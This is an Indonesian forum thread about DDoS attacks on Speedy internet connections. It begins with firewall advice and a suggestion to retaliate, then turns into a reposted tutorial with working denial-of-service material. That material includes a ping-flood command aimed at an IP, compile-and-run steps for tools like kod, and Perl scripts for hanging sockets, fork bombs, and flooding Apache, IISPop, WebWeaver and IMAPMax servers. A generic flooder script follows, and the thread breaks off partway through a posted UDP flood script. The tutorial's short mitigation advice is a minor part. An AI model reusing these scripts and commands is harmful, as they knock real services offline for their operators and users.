Topic: about ... DDOS / Nembak IP

Tolong jelasin kronologisnya & cara ngeblock nya kalau kita pake Speedy roll

Re: about ... DDOS / Nembak IP

Sallam kenal.......
Om2, KK2 sekalian saya mo curahat neehh...
kemaren di server biling saya tiba-tiba keluar outlook banyakk banget, sama IE nya juga sampe kompie nge- hang, itu kenapa yah, apakah kompe saya di hack...
trus gemana cari menanggulanginyaa:(

Re: about ... DDOS / Nembak IP

Kalau untuk jenis modem combo agak susah untuk proteksi di sisi modem karena biasanya tidak disertakan firewall jadinya mainnya disisi computer client nya yang dipasangin firewall.

Kalau untuk jenis modem router biasanya di device nya sendiri sudah disertakan firewall yang bisa kita set sendiri port mana yang mau dibuka/diblok.

Minimun kita harus ubah default akses ke modem kita seperti akses ke web management nya dan akses ke telnet nya. Trus kalau bisa ya DHCP dari external network nya di deny.

Re: about ... DDOS / Nembak IP

Saya sendiri di rumah masih menggunakan modem combo (suatu saat modem nya pasti diganti dan akan saya ganti ke router) biar proteksi nya lebih kuat.

Kalau ada yang nge-DoS atau nge-DDoS ya kita bales aja lagi dia nya. Dengan catatan kita pakai account yang unlimited. Kalau account kitanya limited ya ngalah aja. Matiin aja dulu modemnya. Ntar dapet IP baru lagi. Kalau kita maksain ngebales nanti malah kita yang ambrol di billing Speedy nya.

Biasanya orang yang melakukan serangan punya akses yang unlimited. Jadi dia tidak khawatir dengan bandwidth atau quotanya bengkak toh udah unlimited. Lagian kan sekarang account-account yang unlimited sudah dikasih IP static. Nah, tinggal laporin aja ke pihak Speedy nya (cuma saya juga masih bingung laporin ke mana gitu lho ..)

Harusnya sih dari pihak Speedy ada orang network yang memonitor traffic jaringan. Jadi pas ada tanda-tanda serangan atau apa yang melalui jaringan Speedy ya tinggal di kick aja koneksi si attacker nya. Beres kan.

Masalahnya adalah .. adakah orang dari pihak Speedy yang memonitor hal ini? Ini masih belum tahu. Atau mungkin pertanyaan nya nambah lagi. Tau gak cara monitoring nya?

Re: about ... DDOS / Nembak IP

kalo saya sih lebih setuju :
"tau gak cara monitoringnya"

soalnya saya lihat network planning di speedy njlimet & tidak efisien (ini yang bikin latency besar)

Re: about ... DDOS / Nembak IP

asepandria wrote:

Harusnya sih dari pihak Speedy ada orang network yang memonitor traffic jaringan. Jadi pas ada tanda-tanda serangan atau apa yang melalui jaringan Speedy ya tinggal di kick aja koneksi si attacker nya. Beres kan.

Masalahnya adalah .. adakah orang dari pihak Speedy yang memonitor hal ini? Ini masih belum tahu. Atau mungkin pertanyaan nya nambah lagi. Tau gak cara monitoring nya?

hallo,

sebelumnya sbg penjelasan SPEEDY dan ISP2 yang lain adalah bersifat link-aggregator. krn jumlah traffic yang sangat besar tier-3 provider "tidak mungkin" melakukan per-IP basis security - kecuali untuk ip-service tertentu.

untuk monitoring adalah pasti, tetapi untuk limitasi fungsi tertentu tidak memungkinkan karena sbg contoh bila di suatu sentral minta ditutup port 25 oleh beberapa pelanggan - belum tentu pelanggan yang lain menerima bukan?

HTH.

7 (edited by abdi_wae 12-08-2007 14:27:35)

Re: about ... DDOS / Nembak IP

onta_mesir wrote:

kalo saya sih lebih setuju :
"tau gak cara monitoringnya"

soalnya saya lihat network planning di speedy njlimet & tidak efisien (ini yang bikin latency besar)

nah, hal ini (traffic monitoring/filtering) yang anda tahu sendiri dapat membuat latency besar.

untuk monitoring traffic lokal pada PC
- windows anda dapat diaktifkan firewall dan aktifkan firewall logging di TCP/IP setting.
- untuk linux set :
iptables -I INPUT -i <wan_intf> -p tcp -m state ! --state RELATED,ESTABLISHED -j LOG
dst dst...

pd iptables

HTH.

Re: about ... DDOS / Nembak IP

Latency kan merupakan waktu terkecil yang diperlukan oleh jaringan untuk mengirimkan sejumlah paket data (yang paling kecil yang masih mungkin bisa dilakukan). Memang sih latency tergantung pada line speed dan kemampuan modem dan router dalam menerima dan men-transmit data. Cuma kalau gak salah kan sekarang (gak tau nih siapa yang pernah bilang lupa lagi) line speed nya speedy sebenarnya sudah lebih besar dari yang di promo kan.

Rekan-rekan yang lain pasti lah pernah mengalami 1 atau 2 detik speedy nya menembus angka 1Mb atau lebih (artinya jaringan Speedy nya sudah siap).

Re: about ... DDOS / Nembak IP

betul latency=waktu terkecil untuk mengirim paket.

tapi,

untuk speedy yg backbonenya pakai ATM - bukaannya rata pada 53 byte - shg latencynya lebih besar dari async-(serial modem) atau ethernet (kabelvision lah) - silahkan coba dengan teman2 yang pake frame-relay atau FTTH dibanding speedy smile.

linespeed itu kan cuma kapasitas signaling modem anda dan itu sudah standard (kalo ggak standard/beda2 kan bisa repot).

HTH.

Re: about ... DDOS / Nembak IP

hanzmorphick wrote:

Sallam kenal.......
kemaren di server biling saya tiba-tiba keluar outlook banyakk banget, sama IE nya juga sampe kompie nge- hang, itu kenapa yah, apakah kompe saya di hack...
trus gemana cari menanggulanginyaa sad

OOT tuh bikin thread baru, tp berhubung gw bukan moderatornya so what tongue

lg browsing2 kemana nih, ada kode jahat di web page yg km samperin tuh......
dengan me-repeat perintah untuk mengirimkan email, jadi outlook nya keluar terus sampe kompi lu gak kuat, nge hang deh... lol
cara menanggulanginya ya jgn buka situs itu lagi big_smile

Re: about ... DDOS / Nembak IP

abdi_wae wrote:

betul latency=waktu terkecil untuk mengirim paket.

tapi,

untuk speedy yg backbonenya pakai ATM - bukaannya rata pada 53 byte - shg latencynya lebih besar dari async-(serial modem) atau ethernet (kabelvision lah) - silahkan coba dengan teman2 yang pake frame-relay atau FTTH dibanding speedy smile.

linespeed itu kan cuma kapasitas signaling modem anda dan itu sudah standard (kalo ggak standard/beda2 kan bisa repot).

HTH.

maaf mas abdi tanya ATM tu apa ya?
sama FTTH,

Sincerely,

Re: about ... DDOS / Nembak IP

asepandria wrote:

Saya sendiri di rumah masih menggunakan modem combo (suatu saat modem nya pasti diganti dan akan saya ganti ke router) biar proteksi nya lebih kuat.

Kalau ada yang nge-DoS atau nge-DDoS ya kita bales aja lagi dia nya. Dengan catatan kita pakai account yang unlimited. Kalau account kitanya limited ya ngalah aja. Matiin aja dulu modemnya. Ntar dapet IP baru lagi. Kalau kita maksain ngebales nanti malah kita yang ambrol di billing Speedy nya.

wah kalau bales2 an terus gak selesai2 dong, bikin pusing... sad
lagian kalo yg ddos bukan pake speedy gmn yg bandwidth nya lebih gede neutral

firewall ya, port yg dipake buat ddos itu port apa ya?

13 (edited by abdi_wae 13-08-2007 08:15:28)

Re: about ... DDOS / Nembak IP

hmmm... google dan wikipedia is your best friend for good knowledge smile

tapi biar cepat :
ATM - Asynchronous Transfer Mode --> protokol yang didesain supaya efisien yang memungkinkan untuk transfer data secara merata sebesar 53byte
FTTH - Fiber To The Home --> ini bukan melulu ttg koneksi dgn FO lho ya smile

DDoS pakai port berapa? jawabnya TCP/UDP 1 - 65535, ICMP, atau protokol apa aja yang bisa dipakai untuk exploit.

HTH.

Re: about ... DDOS / Nembak IP

DoS (Denial of Service) attack merupakan teknik serangan yang hanya menggunakan 1 computer untuk menyerang computer lain nya.

DDoS (Distributed Denial of Service) attack merupakan teknik serangan yang menggunakan beberapa computer untuk menyerang computer lainnya. Si penyerang biasanya lebih refer menggunakan tipe serangan DDoS karena efeknya lebih cepat dibandingkan dengan hanya menggunakan 1 mesin penyerang.

Salah satu teknik yang sederhana untuk melakukan DoS adalah dengan menggunakan perintah ping untuk mengirimkan paket data yang besar ke computer tujuan. Makanya untuk menghindarinya aktifkan saja ICMP sehingga pc kita tidak bisa di ping dari luar.

Intinya sih untuk mematikan service yang ada. Biar port 25 mati ya kirim aja packet flood ke port 25 dan seterusnya.

Re: about ... DDOS / Nembak IP

abdi_wae wrote:

hmmm... google dan wikipedia is your best friend for good knowledge smile

english gak mudeng sad iks

abdi_wae wrote:

DDoS pakai port berapa? jawabnya TCP/UDP 1 - 65535, ICMP, atau protokol apa aja yang bisa dipakai untuk exploit.

berarti gak bisa di blok firewall dong neutral

abdi_wae wrote:

HTH.

ini artinya? big_smile


@asepandria

terima kasih info nya, sy skrg jd paham roll

Re: about ... DDOS / Nembak IP

Agaknya perlu juga diterangkan tehnik-tehnik serangan DoS dan DDoS, agar semua tahu dan paham mengapa tehnik tersebut bisa mematikan. Contohnya mungkin yang sederhana adalah bagaimana kita membanjiri (fload) data ke port-port yang terbuka.

Wujudkan desa anda terkoneksi oleh Internet dengan baik.

Re: about ... DDOS / Nembak IP

Xerophie wrote:
abdi_wae wrote:

hmmm... google dan wikipedia is your best friend for good knowledge smile

english gak mudeng sad iks

abdi_wae wrote:

DDoS pakai port berapa? jawabnya TCP/UDP 1 - 65535, ICMP, atau protokol apa aja yang bisa dipakai untuk exploit.

berarti gak bisa di blok firewall dong neutral

abdi_wae wrote:

HTH.

ini artinya? big_smile


@asepandria

terima kasih info nya, sy skrg jd paham roll

Artinya coba di cari dulu di Google search engine dan Wikipedia untuk masalah-masalah yang kita belum ngerti.

Bisa di blok dengan firewall (harus belajar cara membuka/menutup port atau tahu mana port yang terbuka). Kalau modem nya jenis router menu2 untuk setting firewall lumayan lengkap.

HTH artinya Hope This Helps (akronim yang biasa digunakan di dunia internet/chatting)

Re: about ... DDOS / Nembak IP

pandai_web wrote:

Agaknya perlu juga diterangkan tehnik-tehnik serangan DoS dan DDoS, agar semua tahu dan paham mengapa tehnik tersebut bisa mematikan. Contohnya mungkin yang sederhana adalah bagaimana kita membanjiri (fload) data ke port-port yang terbuka.

Sepertinya Om harrychanputra nih yang harus banyak mengeluarkan ilmunya di sini.

Salah satu contoh sederhana adalah dengan menggunakan perintah ping untuk memberikan banjir paket.

Kalau di Windows pakai command prompt bisa pakai sintaks ini :

ping 125.163.14.155 -t -l 65500

Penjelasan :
125.163.14.155 adalah IP komputer yang akan dijadikan sasaran
-t artinya jalankan perintah ping ini secara terus menerus (continues)
-l 65500 artinya kirimkan paket buffer size sebesar 65500 (paket maksimal yang bisa dilakukan lewat perintah ping)

Tetapi kalau ICMP di pihak komputer sasaran dihidupkan (artinya tidak bisa di ping) maka teknik ini tidak terpakai.

Re: about ... DDOS / Nembak IP

waduh waduh serem aja mendingan bukak aja http://sekuritionline.net di sana banyak om ngebahas gituan heuhue kalo cuman ddos doang sih ada kok di sana sampe apa pun yang kalian tanyakan insya allah bisa di  bantu

20

Re: about ... DDOS / Nembak IP

tapi percuma aja sih, tinggal restart modemnya pasti dapet IP baru. nah yang paling seru adalah "membajak" modem tersebut dari jarak jauh (udah kayak mbah dukun bisa mrentah dari jauh). biarpun udah dapet IP baru tapi tetep aja modemnya bisa kita kontrol. tongue

paling jahat sih bisa melakukan re-write data yang ada di IC modem tersebut sehingga modemnya jadi useless. seperti manusia tanpa ruh.
tongue

Re: about ... DDOS / Nembak IP

Serangan Denial of Services
##################################################

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu).

Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.


.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya.

Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.

Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ...


.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing" (http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q= … cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk
# URL : www.sekuritionline.net
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk
# URL : www.sekuritionline.net
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentinya server dan harus di-restart secara manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk
# URL : www.sekuritionline.net
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melakukan input flooding dan membuat tool sendiri. Namun Denial of service adalah masalah layanan publik. Sama halnya dengan anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.
2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service -. Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor atau melakukan up-date.
3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti.

Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.


NB : kalo ada salah kata mohon maaf yang sebesar besarnya

Re: about ... DDOS / Nembak IP

cool 2 thumbs cool

untuk penjelasannya -

untuk kita semua :
threat arie diatas hanya untuk knowledge aja - bukan untuk praktek mainan di internet.
contoh hal diatas banyak kok di internet (ggak perlu disebutkan sumbernya) -

cuma yg harus dipahami adalah bila kita mengerjakan sesuatu yg bagus - hasilnya akan kembali ke diri kita sendiri, dan sebaliknya.

cheers.

Re: about ... DDOS / Nembak IP

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

canggih mana dari pada upd.pl mas??

Re: about ... DDOS / Nembak IP

-- udos.pl --

gimana cara pake na nich..

Re: about ... DDOS / Nembak IP

ok gua ada contoh ddos pake udp.pl

langkah pertama di wget dulu tuh scipt nya

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
